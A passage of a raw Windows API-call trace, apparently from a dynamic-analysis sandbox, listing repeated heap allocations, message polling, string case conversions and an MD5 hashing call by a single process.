(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.425] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0265.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.425] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.426] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.426] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.426] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0265.427] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.427] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.427] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.427] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.427] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.428] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.428] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0265.428] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.428] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0265.428] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.428] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.429] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.429] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0265.429] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.429] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.429] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.430] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.430] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.430] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.430] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.430] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.431] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.431] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.431] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.431] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0265.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.432] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.432] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0265.432] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.433] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.433] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0265.433] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0265.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.434] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.434] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.435] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.435] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.435] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.435] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.435] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.436] CryptHashData (hHash=0xaa5760, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0265.436] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0265.436] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.437] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.437] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.437] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.437] RtlAllocateHeap 